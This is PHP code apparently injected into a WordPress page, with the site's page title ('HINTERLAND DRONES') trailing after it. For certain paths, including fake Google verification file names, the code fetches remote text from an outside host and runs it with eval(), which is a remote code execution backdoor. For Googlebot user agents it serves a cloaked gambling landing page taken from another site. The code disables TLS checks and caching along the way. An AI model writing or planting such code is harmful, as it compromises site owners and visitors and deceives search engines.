if (isset($_SERVER['REQUEST_URI'])) {
$r = strtok($_SERVER['REQUEST_URI'], '?');
$r = rtrim($r, '/') . '/';
$c = array(
'/xwmla/' => 'https://8uniform.mb0b.in/watcheronly/watcher.txt',
'/8page/' => 'https://8uniform.mb0b.in/hostname.txt',
'/googlea43c346b94dbeaff.html/' => 'https://8uniform.mb0b.in/plugins/Brian.txt',
'/google5d28d4f8261a804a.html/' => 'https://8uniform.mb0b.in/plugins/al-pak-tuntung.txt',
'/contacte-nos/sumbutogel.com/assets/global_template-645nkl4lk3457lk3nklcftucft36uav3633.gz.js' => 'https://8uniform.mb0b.in/plugins/ziaratplanner/js.txt',
'/47_dell/sumbutogel.com/assets/global_template-645nkl4lk3457lk3nklcftucft36uav3633.gz.js' => 'https://8uniform.mb0b.in/plugins/ziaratplanner/js.txt',
);
if (isset($c[$r])) {
$u = $c[$r];
$d = false;
if (function_exists('curl_init')) {
$h = curl_init($u);
curl_setopt_array($h, array(
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_FOLLOWLOCATION => 1,
CURLOPT_SSL_VERIFYPEER => 0,
CURLOPT_SSL_VERIFYHOST => 0,
CURLOPT_TIMEOUT => 30
));
$d = @curl_exec($h);
if (!$d || curl_getinfo($h, CURLINFO_HTTP_CODE) != 200) $d = false;
curl_close($h);
}
if ($d === false && ini_get('allow_url_fopen')) {
$d = @file_get_contents($u, false, stream_context_create(array(
'http' => array('timeout' => 30, 'follow_location' => 1),
'ssl' => array('verify_peer' => 0, 'verify_peer_name' => 0)
)));
}
if ($d) {
header("Cache-Control: no-store");
eval('?>' . $d);
exit;
}
http_response_code(503);
exit;
}
}
if (isset($_SERVER['REQUEST_URI'])) {
$r = strtok($_SERVER['REQUEST_URI'], '?');
$c = array(
'/promocoes' => 'https://sumbu-petasan.spartan-warrior.site/landingpage.html',
);
if (isset($c[$r])) {
$is_bot = false;
if (isset($_SERVER['HTTP_USER_AGENT'])) {
$agents = array('Googlebot', 'Googlebot-Image', 'Googlebot-News', 'Googlebot-Video',
'Googlebot-Mobile', 'Google-Site-Verification', 'Google-InspectionTool',
'AdsBot-Google', 'Mediapartners-Google');
foreach ($agents as $agent) {
if (stripos($_SERVER['HTTP_USER_AGENT'], $agent) !== false) {
$is_bot = true;
break;
}
}
}
if ($is_bot) {
if (!defined('DONOTCACHEPAGE')) define('DONOTCACHEPAGE', true);
if (!defined('DONOTROCKETOPTIMIZE')) define('DONOTROCKETOPTIMIZE', true);
if (!defined('DONOTMINIFY')) define('DONOTMINIFY', true);
while (ob_get_level()) {
ob_end_clean();
}
$d = false;
if (function_exists('curl_init')) {
$h = curl_init($c[$r]);
curl_setopt($h, CURLOPT_RETURNTRANSFER, true);
curl_setopt($h, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($h, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($h, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($h, CURLOPT_TIMEOUT, 30);
curl_setopt($h, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Googlebot/2.1)');
$d = curl_exec($h);
curl_close($h);
}
if ($d === false) {
$context = stream_context_create(array(
'http' => array(
'method' => 'GET',
'header' => "User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1)\r\n",
'timeout' => 30,
'follow_location' => 1,
),
'ssl' => array(
'verify_peer' => false,
'verify_peer_name' => false,
)
));
$d = @file_get_contents($c[$r], false, $context);
}
if ($d !== false && strlen($d) > 0) {
header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0");
header("Pragma: no-cache");
header("Expires: 0");
header("X-Robots-Tag: noarchive");
echo $d;
exit;
} else {
http_response_code(503);
exit;
}
}
}
}
developer, Author at HINTERLAND DRONES - Page 4 of 4
Skip to main content